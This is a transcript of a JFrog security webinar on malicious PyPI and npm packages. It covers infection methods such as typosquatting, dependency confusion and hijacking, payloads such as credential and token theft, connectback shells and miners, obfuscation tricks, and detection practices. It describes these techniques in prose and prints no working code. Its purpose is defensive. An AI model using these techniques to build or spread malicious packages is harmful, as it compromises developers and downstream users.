Identifying and Avoiding Malicious Packages

Securing your software supply chain is absolutely critical as attackers are getting more sophisticated in their ability to infect software at all stages of the development lifecycle. This webinar, hosted by JFrog Director of Threat Research Jonathan Sar Shalom, will be a technical showcase of the different types of malicious packages that are prevalent today in the PyPI (Python) and npm (Node.js) package repositories. All examples shown in the webinar will be based on real data and malicious packages that were identified and disclosed by the JFrog security research team.

We will dive into:

  • The types of attacks and types of payloads contained in these malicious packages
  • Explain how these malicious packages can be identified and rejected
  • Best practices for a secure development workflow and relevant OSS tools to use
  • Conclusion / Q&A

Video Transcript

Host: Thank you so much, everyone for joining “Identifying and Avoiding Malicious Packages!” We’re really excited to have you here; we have a lot of great content to present to you. I’d love to introduce you to our Director of Threat Research at JFrog Security, Jonathan Sar Shalom.

Jonathan Sar Shalom: Hello everyone, my name is Jonathan and I’m the Director of Threat Research at JFrog Security. Our topic for today is identifying and avoiding malicious packages. We’re going to learn the technical details about the world of malicious packages, as well as how to identify and prevent an infection by one. So a few words about myself my background includes more than 13 years in cybersecurity with experience in security research, reverse engineering, and malware analysis. Nowadays, I’m leading the Threat Research Team in JFrog Security specializing in vulnerabilities analysis, threat intelligence research, and automated threat detection. As for the agenda, we will first introduce the security threat inherent in supply chain and learn the key role that malicious packages pay in it. Then we will dive into the technical details of malicious packages infection methods, common payloads use the malicious packages, and how attackers hide the malicious code in them. After that, we will take a look on real code examples of malicious packages when the majority of the examples that we will present are real malicious packages that were found by JFrog security researchers are were publicly disclosed. Finally, we will present the techniques to detect and prevent malicious packages both known and unknown, and show the best practices for secure code development to avoid and mitigate the risk of malicious packages. When we talk about the malicious packages security threat, we first need to understand the bigger problem that the malicious packages are a part of. This is their supply chain attacks. In modern software development, many applications integrate third-party software in the code and trust the third-party software to supply a secure and stable software. In reality, this practice also involves some danger of course, because third-party software might contain vulnerabilities or malicious code that will be delivered through the supply chain or third-party software, together with the software itself. This vulnerabilities and malicious code will eventually affect the end product, and the end product that depends on it. Essentially, a software supply chain attack is a technique is which an advisory slips malicious code or an entire malicious component into a trusted piece of software or hardware also. So, from a technical point of view, if you look at the term here in this slide and the essence of this, you will see that there are no single targets that are being involved in this attack, because when you attack a supply chain by infecting the software package, for example, you will eventually end up with attacking all of the end consumers of this supply chain. You can understand already the first reason of why an attacker and would go for the supply chain approach because of the high distribution of the attack. Let’s talk now on the effort that the attacker needs to invest in supply chain attack, compared to classic targeted attack that we’ve seen a lot in the last 20 or 30 years and it will help you understand why this attack method became so popular recently. You know classic targeted attacks have to invest a lot of time and money into compromising a single target and it becomes even harder when the target is a known software platform, because those platforms are highly maintained and secured, compared to many relatively small software packages that are out there. So for a targeted attack, an attacker would need high technical skills, because essentially involves finding a vulnerability and developing a working exploit for it. You can take a look at the pricing table here on the right, taken from Zerodium, which is an exploit acquisition platform actually. You can see remote code execution exploit costs can cost up to $1 million for a single exploit. When the most expensive one is a zero-day RCE/remote code execution exploit for windows. When attacking the malicious open-source software, for example, the options are endless. There are many packages out there, so the attacker simply have to find a single package to attack or to publish a single malicious software package and it’s a game over for the entire consumers of the supply chain of this package. As we said this essentially abuses the trust that exists between parties in the supply chain, making this attack method so effective. There are three different types of supply chain threats, two of them are based on software vulnerabilities that whether intentional or unintentional once. Those vulnerabilities usually refer to our software bugs where each bug is normally assigned with a CVE identifier. CVE is a common standard to describe vulnerabilities and exposures, and they are widely used to document and track vulnerabilities in software. The third type here in the in the right side of the of the slide is the third type of the supply chain threat. And this is the one that we’re going to focus on today is the malicious component or the malicious software package. Usually CVE is not assigned to this type of threat and the entire package or specific version of the package simply target as malicious. Let’s give you real life examples for each so for the unintentional bug, but we have, of course, the infamous log4shell vulnerability that shook the world, a few months ago. The log4j package is highly used by Java projects, so the global effect of this vulnerability was really huge. For the intentional bug, we can see, also the famous solarwinds attack when solarwinds Orion software platform was attacked and a backdoor was injected to it. Thousands of consumers of this software were affected by the attack, leading to even more followup attacks that were carried out later. So in this presentation of course we’re going to focus on the malicious components threat, and here we can see an example. From one of our publications on malicious Python packages, specifically that then we found and disclosed recently. So after introducing the supply chain attacks and how malicious software packages play a key role in it, let’s dive into the technical details. First we’ll start with the infection methods attackers use for spreading malicious packages. There are several main infection methods that we will present. This includes the type of squatting infection method, their masquerading method, Trojan packages also, dependency confusion or name squatting, and also packages hijacking. The first infection method is called the typosquatting typosquatting is the practice of obtaining or a squatting popular name with a slight typographical error. This practice that applies to many different their resources such as web pages, executable names, and also software packages names that we’re going to focus on today. Let’s take one classic example buying the domain gogle.com instead of the legitimate known google.com hoping that users will occasionally, make a typing errors and reach the illegitimate domain. This can further be used for any kind of attack payloads, such as phishing, and code injection attacks. In a trend we are seeing recently, some maintainers and developers of software packages are taking an active role and actually reserve typosquatting names for their projects. This is for preventing attackers from taking control of them. Regarding our example of a google.com Google actually registered this domain, specifically, so if you browse to Google gogle.com you will end up be referred to google.com. Oh here, you can see, the first example that we will see today have a malicious package. That use the typosquatting infection methods, this package was detected in a recent research conducted by our researchers in JFrog security by using automated your risk scanners that detect malicious activity in open source packages. We will elaborate on the eucharistic detection of malicious package later, but for this case, specifically the scanners found that the software package contains a payload with a crypto minor activity. As for the specific type of squatting attack that was used here the malicious package name mplatlib leave, which you can see here in the console is very similar to the legit package and mplatlib, which you can see here in the npm site. As you can see in the at the console log at the time of research, the malicious package could be installed by a simple typo error, of course, the existence of this package, as well as other malicious packages that were reported to PipeBI and was removed since then decided a typo squad in there is an interesting trend of another infection methods in which malware authors completely duplicate a well-known package, the authors or the attacker is duplicate both the Code and the metadata of the original of the original project, which they would like to impersonate. And then also add small piece of malicious code to this duplicate essentially building Trojan packages. This infection metal is similar to the typosquatting infection model in a way that the attackers use a name similar to the legitimate package name, but the difference is that the aim to deceive developers through a similarity to the illegitimate back end rather than aiming for an accidental use by typo errors. This is an example that you can see here of the malicious package markedjs, which was found during one of our latest researchers from last month actually. You can see that the original name and metadata of the markedjs malicious package were copied from the original Marked package, making it very hard to distinguish between the two, the URL. Of the report is the same as well as the homepage and the description and the entire metadata, the only thing that is different here is the. Actually, the package name, which is markedjs instead of Marked, and this can also this this can confuse of developers that they will go in and start the markedjs package. When comparing them malicious package markedjs code, with the original package Marked code, we can see that the only difference from the original package is one line in a single file. This is the long line here, marked in black. You can see that this line does not contain a readable code and it realized between other legitimate and readable lines. This is actually the obfuscated malicious code, which is the only addition to the original legitimate package, making this modified package to be a fully functional from one side, but also malicious from the other side. We will talk later about the obfuscation techniques and the different techniques that are often used by attackers, but one thing to remember, for now, is that, since this line is buried inside the rest of the package, which contains a lot of legitimate code, it would be very difficult to find this line without automated scanning or different tools. Another infection technique is Trojan package in disinfection method, the attacker publish fully functional library, but also hid a malicious code in it. The same as their masquerading method the malicious code is usually small and obfuscated therefore, it is hard to detect and differentiate between it and the legitimate functionality of the package. In the screenshot here, you can see, an example of the readme file of a very interesting Trojan package called Lemaaa this malicious Trojan package was caught by our scanners in one of our latest published a research. This package is a utility for this code accounts hacking intended for use by malware authors to hack this code accounts. First of all, a short break to explain about the Discord network for those of you who are not familiar with it, Discord is communication app with the hundreds of millions of registered users that allow voice calls, video calls, text messaging and more. The identity of a user in the Discord network is presented in a string called the Discord token, which is basically a set of letters and numbers that acts as simply as an authorization code to access the Discord servers. It’s effectively a user credentials that can give the attacker full access to the victims’ Discord account. So, going back to the Lemaaa library here, as we said the library itself is a fully functional published library, which is actually meant to be used by attackers to steal Discord tokens. So the interesting story here is that the Trojan code in this package is aimed to steal the Discord tokens from any attacker that uses this library for tokens stealing. When the libraries use the it will hijack the secret Discord token given to it, in addition to performing the requested utility function. So take a look on the malicious code of this library and here in the obfuscated code, you can see this function that contains a payload that hijacks the supply the Discord token and send it to a hard coded web URL which you can see here. Essentially, sending the token to the attacker control side in the de-obfuscated code here at the bottom, we can confirm that the function name is “remove all friends”, and we can see it uses http post request to send the supply the token, you can see here. Regarding the obfuscation, since the function is in malware library itself in the malware library itself it’s actually not overly suspicious that is coding is obfuscated and dust novus malware authors may trust this model, even with it say obfuscation. The next infection, is called dependency confusion and it exploits a vulnerability in the way that many package managers download dependencies during build process, for example, PyPi or npm the vulnerability resides in the fact that most package managers, such as PyPi or npm, do not distinguish between internal packages hosted on internal company servers and external ones hosted on public service. Thus does simple commands such as PyPi stored my package you would grab my package, either from an internal or public server. In the dependency confusion and method, the attacker uses a specific package name of internal package of specific target and publish malicious package on an external public repository with this exact name. Usually the attacker also assign a very high version number to this publish package. In this scenario, most of the default package managers, as we said, will prefer to download the external malicious package because it has a higher version number rather than downloading a low version number from the legitimate internal repository. We can see here in this screenshot and a nice example from our research that was published last year by a security researcher named Alex Berenson. What we can see here in the screenshot is a publicly available package in PyPi with a name that looks like an internal package of Netflix you can see the ntfx here and a very high version number, which is 6969. Which is, which is very high. With this attack person managed to successfully exploit the Netflix, as well as the Apple, Microsoft and other giants, by making the servers to download the malicious external package, instead of the legitimate internal one. Another example of dependency confusion attack can be found that actually in a research that we at JFrog Security, published this past December. As you can see in the list of malicious packages that we detected as part of the research among many packages that to use the typosquatting attack method. We can see one package that was probably spread using a dependency confusion attack. It can be easily detected without ridiculous the very high version number that generally not used in a normal product version link, you can see it here. On the last infection methods that we will talk about is the package hijacking. This method involves taking over a legitimate known package and pushing a malicious code into it. Well, this is not an easy task, it is, it is very effective, because it can take advantage of the popularity of very known packages for our high infection rate. The hijacking is usually performed by hacking maintainers’ account and developers’ account or by injecting hidden or obfuscated malicious code is part of our seemingly legitimate code contribution to an open source project. Several months ago it was detected that the few notable that several packages were attacked and hijacked by taking over the maintainer accounts and pushing a malicious code to several versions of those packages. In this screenshot you can see, one of the packages, one of the hijack packages called UAparser.js as this is a very popular package with almost 1 billion downloads. To date, the interesting thing in this package is that the malicious code that was injected to this package was the same as in another malicious package that originally masqueraded this UAparser.js package. We can see here at the announcement by the developer of the package, saying that he believes someone hijacked his package and published malicious version of it. This incident and other recent incidents made github actually enforce two-factor authentication for npm and admins of popular npm packages. By the way, it is also worth mentioning the publicize the incident of the known npm packages feature and the colors were theirs maintainer intentionally sabotaged their popular packages adding some sort of infinite loop into their code which broke thousands of projects that depends on them. You can say pretty much that he hijacked his own project and created a lot of damage by doing that. So, now that we presented the infection methods that are used by malicious packages, we can continue to the payload phase. After our successful attack or infection or malicious packages usually dedicated would like to execute a payload that will serve his needs. So we will present some very common payloads that are executed in malicious packages, we will mention and analyze sensitive data stealers that get user data. Also connectback shells, download and execute payloads and, of course, the very popular method many pretty popular payload of crypto miners. On the first payload that we take a look at is sensitive data Center which steals credit card information from the autocomplete feature that we have in modern web browsers essentially for autocomplete to work modern browsers save in their databases previously tied user information, such as the addresses, passwords and credit card information, this is very convenient for the user, but the downside is that this information can be leaked by malicious actors that get access to the local machine. In the code snippet here we can see the payload codifying malicious package code owners package called noblesse which we found in in one of our recent project last year, we can see that the malware tries to steal credit card information from chrome browser by connecting to its chrome database. You can see the connection string here and querying for credit card information that you can see it with this SQL query here. Essentially, the package sends this information to the attacker, so this is a very dangerous practice. Additionally, the same malicious package that we just saw also tries to steal saved passwords and, in this case, specifically from Edge browser database. You can see the path of the saved passwords that malicious code and connect to it, and then the SQL query for growing those passwords. Another interesting data stealer is Discord tokens stealing payload this fail simply tries to steal our users Discord token which we already mentioned earlier. In this failed the stolen Discord tokens can be used to log into the victims this code account so the account can be used, for example, as an proxy in another future adapt or be used to spread malware to other discord users that trust the these hacked account or when the attacker is lucky enough. To come across a premium account they can sell it and actually make profit from it, of course. It also very interesting for a payload that to steal information in environment variables, so this is another data stealer payloads, the environment variable payload. In a researcher we conducted the in last December, we disclosed 10 malicious packages that performed the environment variable def. Those packages that were spread by our typosquatting attack and it was noticeable that they do not contain any legitimate functionality, but rather container small snippet of malicious code which is possible to understand, even when obfuscated as we can see here in the in the code snippet. In the code snippet you can see that the malware gathers all of the victim process environment variables and post them to a remote URL, which you can see the post request here. This is a dangerous payload since the environment variable our prime location for keeping secrets that need to be used by runtime software, this is a common practice in production system. Because saving secrets in runtime is safer than keeping secrets, including storage or passing the secrets via command line variables, for example, so here, you can see an example for this for this data. Specifically, the AWS command line interface, which supports getting the AWS secret access key from an environment variable, and this is a very common practice for AWS deployments as can be seen in the above configuration example. The next payload type is the connected shell. The purpose of this payload type, simply to receive remote commands for execution on the victims’ machine so generally in this payload there are simple three steps. The first one is connecting back to the attacker is the server, then receiving commands to execute and then sending back the execution results to the server. So let’s take a look at an example from another malicious package, we found that disclosed in JFrog Security actually very recently in the last month. These are two Trojan packages named hpid/hipid, which are Python libraries that are supposedly meant for hiding processes in Linux through the API that they provide called hide processes in reality when this API is called it also calls the function release elf. You can see here which install command connectback shell, that is aimed exclusively at Linux target machine. Let’s take a look at this release of malicious function, we can see that the code base 32 Trojan binary, you can see it here. It is interesting that the this binary is embedded in the Python code is basically because it is an uncommon, and coding comparing to basics before that is widely used this is this base 32 encoding may have been used for evading automated scans we do not expect this kind of encoding. So after the decoding the Trojan package is written to the path of “syslogd” binary which you can see here is simply for replacing it.  Also, you can see that the owner permissions and the timestamp are copied to this new file from another system file, to make the Trojan file similar to other system files and avoid detection. You can see it here with the “chmod, chdmod” and the touch commands. In the last line the Trojan file is executed using the function of the “popen.” So next drop Trojan is being executed, and this is actually an “L file”, that is quite small and obfuscated when executed is performs the three steps of a classic connectback shell that we already described. Connectback to the docker server receiving commands to execute you can see it. Here the “popen” and receive that commands and then sending back the execution results to the server by encrypting it and sending it to the attacker server. The last payload we will talk about is the cryptominor payload. This payload utilizes the victims system resources for the mining of cryptocurrency. We’re not going to dive into the technical details of crypto mining due to time constraints, but keep in mind that this is a very common payload type in malicious packages, simply because of the nature of malicious packages attacks. As you remember most of the time malicious packages are not used in a targeted attack, but rather by spreading them to as many victims as possible with all of the infection methods that we mentioned earlier, so utilizing many system resources from many victims is a good idea for a profitable payload, such as the cryptocurrency minor. In this code snippets you can see that the payload of “maratlib” package, this is another malicious package that we recently detected that was spread using the typosquatting attack. In the above code snippet you can see that as part of the setup code of this package, it also downloads and executes the remote bash script “aza.sh” as you can see here. In the screenshot below, we can see the code of this bash script which also downloads and execute unknown cryptominor called “PhoenixMiner,” you can see here this actually the actual payload that actual cryptominor which sends that to the wallet of the attacker which you can see it here, this is a cryptocurrency and our for the cryptocurrency called up. So, now that we talked about that infection method than the payloads that are usually used in a malicious packages attacked. We will talk about another main interest that the attackers have when creating a malicious package which is hiding them malicious code. So besides performing another successful infection and payload execution and malicious packages authors would want to avoid the detection of their malicious activity for achieving good success rate of an attack, attackers would like to avoid detection by code analysis security tools, and also to make it hard for any security researcher to reverse engineer their malicious package. So this is a very common technique for achieving these goals and it’s called the code obfuscation. We’re going to discuss several code obfuscation that connects including off the shelf public obfuscators costume obfuscation and techniques and also an obfuscation method which is, which is the invisible backdoor, which is not an obfuscated method by itself, but rather our technique to invisibly change the source code logic without producing any visual artifacts. So let’s take a look on a public obfuscator, for example, this obfuscation simply called Python obfuscated tool, it was used in novelists to malicious packages, we found the last year. The orchestration mechanism here is simply the encoding of Python code that dex with basics before and then decode it on runtime, compile it and execute it. This is a very simple technique in the code snippet, we can see an example of Hellowordprint in Python that was obfuscated automatically with this tool. We can see at the usage of basic 64 strings here; the decoding of them using the be 64 decoder function, and also the compile and default functions that are called to execute the decode code. The obfuscation can tweak a simple static analysis tool but doesn’t stand against more thorough analysis and actually raises a red flag that will make many research many security researchers to take a closer look at this code. And that was actually the case with this example when our automatic a malicious packages detection scanners alerted this kind of behavior. Let’s take a look at another obfuscation technique, a more complex one and called the control flow flattening. In this technique, the structure of the codes that control flow is broken into blocks that are put next to each other instead of their original nested levels. This method was used in a malicious package we detected called the Discordlofi. The package payload was a Discord token grabber and it was spread by the typeosquatting and the Trojan infection methods. We can take a look on this technique, with an example from a paper that was published on the subject. Look at the original code on the left side here and we can split it into three codes blocks. First, we have the variables industrialization at the top, then a while loop with a break air condition and, finally, the code book inside the while loop. On the right side, you can see the code after applying the obfuscation and with this obfuscation technique. You can see that the three code looks are flattened and a switch case is used to control the flow of the code, you can see the switch case here. You can also see that the variable s w bar, here holds then number of the ID of the code block that is being executed right now, In the end of each show called block its value is change to indicate the next code book that should run. So basically with the with this test switch case, we when the Code, the run it will call the next block that should run and even in a dynamic way. So you can see here and when we take a look on the while loop, you can see that we can end up in the in the in the code block number three or in callback number zero, which is the end of the program. This is this also this of course implements the while loop that we can see in the left side. And lastly, we will talk about that technique, called the homoglyph characters attacks, which is not an obfuscation by itself, but it can be used to hide malicious code notifications in legitimate software packages. This technique was published in a recent in the recent Trojan source paper demonstrate the possibility of changing source code in an invisible way. It essentially means that the logic of the code can be changed to contain a vulnerability, for example, without producing any visual artifacts. So, in this technique attackers use unicode characters that look like standard ASCII/Latin in their characters that. A normal reader wouldn’t know this, but the compiler or the interpreter and will treat them differently, so the logic of the code will be changed. This technique can be used by supply chain attackers to plant invisible backdoors into popular source code repositories for example and attacker might change a string later or check or a function call to make it always succeed or always fail in an invisible manner by changing one of the strings characters to automatically. Let’s take a look at the example in the code snippet here, these two functions appear identical, however, at the bottom function name uses the kulick H character that you can see here which counts as a completely different function name a code later in the program may call any of this two functions in indistinguishable manner and the logic that it will be executed will be different. Another invisible method that was introduced in the Trojan paper was the unicode bi directional control characters. These characters are normally used to control the flow of text either right to left or left to right for different languages. When using bi-directional control characters in source code, the unicode encoding can produce the strange artifacts such as source code line that visually appears in one way, but parsed by the compiler of the interpreter in another way, so, for example, take a look at this code snippet in the left, which is the original code. From the rhythms point of view, the code appears not to print, “you are an admin” this since is admin that you can see here is false. However, as the can be seen in snippet on the right, if I unicode bd and control character was inserted in the correct position in the condition check that you can see here, the checkline could actually be interpreted by the compiler as a full comment, so the entire if condition can be bypassed and the logic will be changed. So, now that we know the technical information off the infection phase, the payload phase, and their obfuscation techniques using malicious packages let’s continue and talk about methods that we use for detecting malicious packages in real life. For example in your development lifecycle in project that you developed. We will present several practical techniques for this purpose for the detection of both known and unknown malicious packages. Let’s start with detecting knowing malicious packages, if we take PyPi or npm, for example, these repositories that defined processes which users can report on a malicious packages. You can see here in the screenshot that package that is tagged as a security holding package because it was accepted as a malicious package and replaced it with an empty project, since it was accepted as a malicious package. When we want to check here for known malicious packages, the most efficient way to do it is by query those repositories. As we want to get a complete picture of malicious packages in our projects we essentially need to do a few things. The first thing is to list their our project dependencies and detect all of the install third-party software versions in our project. The artifact of this project is called the software bill of material or SBOM which includes all the information on the installed third-party software, which we can use later to query the those public repositories. This process might not be easy to perform in scale as part of your software development lifecycle, so it is recommended actually to automate the process by using a software composition analysis tool, so we of course can recommend you on our own solution. For this purpose, called the JFrog Xray, which is not only a software composition analysis tool, but a complete solution for the management of vulnerabilities and software supply chain risk in your projects. Including the capability of the detecting malicious packages Xray scans the entire development pipeline from the code in Git, to your Ide, through your CI/CD tools, and all the way down to the distribution to production it essentially integrates the detection and prevention of malicious component in your development and build system. When we talk about the detection of unknown malicious packages we essentially need to find a way of identifying characteristics of malicious packages before they are known as malicious. So in JFrog, for example, we’re not only updating the Xray database with an up to date, unknown malicious packages names and versions, but for the purpose of detecting unknown malicious packages, we also develop and run heuristic scanners that scan the code of software packages and detect anomalies in them. These scanners alert on possible unknown malicious components. The scanner infrastructure is actually the foundations for all of the malicious packages that we research, publish, and disclose. So with the scanners, we were able to find new malicious packages and, of course, giving you the examples of the malicious packages in this webinar. This list contains and examples for scanners that we developed the way that the scanners work look for a new malicious component packages if we’re trying to find evidence of malicious activity in any of the attack phases we discussed today. It can be in the infection methods in the payload phase, by looking for evidence of the type of payloads that we presented, and also on the hiding methods the obfuscation techniques and for any invisible character in the code. For example, so is theoretically possible to develop a scanner for every phase of the attack. So think about this list as a list of demonstrations of heuristics techniques. This way you can think about more techniques, if you are interested in hunting unknown malicious packages. so let’s take a few examples of scanners. For example, for the typosquatting and then masquerading detection, the scanners check for similarity between popular packages names and other unpopular packages. So if we see a very popular package name that has a match with unpopular package name it looks similar then we alert on that and research that and also update our database and let the world know that this is a malicious package. For the dependency confusion detection for important for another example, the scanners checks internal packages names are popular targets on their remote public repositories and then, if we have a match, we can we can look into it and understand better if this is malicious package or not. For the download and execute, for example, we look we making an automatic reverse engineer on the code on the code of the packages to build an asd that will try to find a connection between a socket activity that downloads data from the Internet, and we try to find if it goes into an execution function, for example, PyPi or system in Python or node.js, so this is another great example that gives us a lot of malicious packages. Let’s take one more example from the obfuscation techniques, you know, several short examples. The detect, for example, the basics before in decoding and evaluation and, just like the example that we saw earlier. And also, and we specifically managed to detected by pamore obfuscator because created significant characteristics and then the code that we could they actually sign.  Also for the invisible characters detector the homoglyphs and they bi-directional characters those are very easy to read the text because normally source code of unknown or any software package should not contain these kind of unicode character, so it was very easy for us to create those scanners, and we encourage everyone who is who has this interested, the who as this interest also to do it as well. We are nearing the end of the webinar and but then we will not end without discussing the best practices for secure development to allow you to essentially deal with malicious packages security threat. So the first recommendation, which is the most important than basic method to deal with malicious packages, as we said, is to use software composition analysis tool as part of your SDLC, the software development lifecycle. You can use the, of course, our tool Xray or any other software composition analysis available; this is the most important step. The second, the recommendation is to define policies and automate actions as part of DevSecOps processes. Based on the results of the software composition analysis to the policy issue the break the build and actually and send alerts when a malicious package is found, unlike CVEs that we can find a lot of CVEs in in our code, we should remind them a malicious package is a very unique and very hard threat, so when we see a malicious package that was detected, we should treat it as a high chance of a true positive, so we actually recommend to break the building in this case. The other thing we could recommend is that you configure your build system to access your remote repositories for an internal packages. This is for preventing, of course, the dependency confusion attacks. Essentially, we want to better manage the way that external repositories are queried and when resolving dependencies in the build process. For example, by setting up exclusion rules to prevent searches for internal private packages in remote repositories or defining the order in which very the repositories research in order to resolve a dependency. More information is available in our blog post here in this in this URL so recommend you to read it. Another thing we recommend to use strict versions for external dependencies. We want to avoid automatic fetching have a higher version malicious package, unless we perform full DevSecOps, the best on a new version of our software that we publish. So this will make sure nothing was broken in the update and everything is safe, so we can go to production, in this case. Specifically node.js, for example, the default behavior of npm is to add a carrot sign to dependencies version numbers, which npm treat as this version or any greater minor patch release. We can overcome that by editing the package json and remove any carrot or tilde so npm will install the exact version that we want, so this is a very good practice when you don’t release a new version of your software and you don’t test it. We can also use the package json to lock the transitive dependencies to a specific version. This this again, this should be done with caution, because although we can promise that malicious updates won’t be received automatically also security patches won’t be received, so it is recommended again to update dependencies when releasing new versions of your software and test them end-to-end.  We also would like to encourage the usage of open-source tools that you can see here and those tools who can help you deal with the malicious packages and prevent them from infecting your projects. The first one is that PyPi-scan which can detect a name similarity to avoid the typosquatting attacks on your project. The next one is piproxy, which is an open-source tool that we developed and published to the community. It is essentially a small proxy server for PyPi that modifies the behavior the same behavior that we talked about to install external packages only if the package was not found on any internal repository. This fixes the dependency confusion issuing PyPi which refers to prefers the package that has the newer version, regardless of whatever it comes from. Lastly, we have a few more open-source tools that we developed in addition to the community and for npm packages security. In the link below where you will find the tool npm secure installed that can help you validate the versions lockdown of your dependencies listing npm and also a package checker that analyze the node package and reports on a suspicious heuristic tool to help determine the safest package version to use in your project. The last tool is the npm issues statistics are very interesting tool that analyzes the projects to find unusual activity that might indicate compromise that dependency. And finally, if you have any question in the future, you can contact me by email I would be very happy to answer your questions on malicious packages and supply chain attacks, of course, we have. In the future feel free to visit us in https://research.jfrog.com/ where you can find all of the malicious packages research projects that we talked about them today, as well as deep analysis of zero-days vulnerabilities found by our security research team and also technical analysis on notable CVEs is that we research constantly.

Question/Answer Section:

Host: Our first question: Do you think this trend is tapering off or still continuing?

Jonathan Sar Shalom: Judging by the amount of hits on our malicious packages detection scanners this trend is still continuing. We think in the future, we might see more sophisticated attacks like Trojan packages with very well hidden code or even dynamic code and also expansion of malicious activities into other repositories in other languages such as the Java, maven, go, nuget and etc, so I think this is not the end for this threat.

Host: Our second question: Do you recommend version locking as a solution against hijacked packages?

Jonathan Sar Shalom: So, as we said, we believe that operating packages is essential, of course, and the end recommend version locking on the while migrating to a new version so DevOps pipeline should be put in place, such that when you a new package version for dependency is released, the application complete the test today is run and also DevSecOps major are in place to conclude, if the new version is vulnerable or malicious. If all tests have passed that the new version should be used. If some tests fail, of course, that application author, should make the necessary changes to migrate to the new version of the package and everything is, of course, essential in order to get the new features improvement and of course the most important thing security fixes. So yes, with a note.

Host: Excellent our last question that we got: What are some of the signs that a package is trustworthy?

Jonathan Sar Shalom: Well, that’s a great question actually. I guess several things…I think the first thing is high amount of downloads, stars and forks, you can check this out on github or the kit repository you of the project or in the specific language that you use and PyPi. So the first thing is as needed to check that it is popular enough. And I think it’s also important to check that it is maintained, like, I mean like maybe the last committee is less than one month old. So the project will see make sure the project is not abandoned. I’m also this is of course important to check that the project does not have any open and security vulnerabilities that were still not handled. It’s a good practice, also to check for obfuscation, I guess, because obfuscation is usually an indicator for malicious activity. And, and another thing for specific version of your software that you want to use the latest version of the package, you have to check that it is not too new. I mean like if it’s not more than two or three days off because normally when we have when we see attacks by malicious actors to infect the packages either insert a new version, and then the entire world is infected within a few hours and within a day from the attack. So it’s important to show that you are not downloading a very new package because of this reason.

Host: Excellent! Thank you so much Jonathan and thank you all for joining. We’re so excited to have discussed the content with you today. We hope, it was informative. If you have any questions or would like to sign up for future webinars or workshops, please visit our website at JFrog.com. Thanks again have a great day.

VULNERABILITY SCAN

Protect your code and prevent unwanted OSS security and license compliance risks from entering your software releases. JFrog Xray is integrated into your software development pipeline.

Available self-hosted, or in the cloud, see how it works.